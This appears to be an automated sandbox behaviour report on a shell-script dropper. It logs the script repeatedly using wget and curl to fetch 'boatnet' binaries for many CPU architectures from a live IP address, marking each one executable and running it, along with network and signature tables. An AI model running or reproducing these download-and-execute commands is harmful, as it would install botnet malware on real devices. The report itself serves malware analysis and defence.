[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:47
Platform
debian9-mipsbe-20240611-en
Max time kernel
92s
Max time network
96s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |
| US | 154.216.19.166:3000 | | tcp |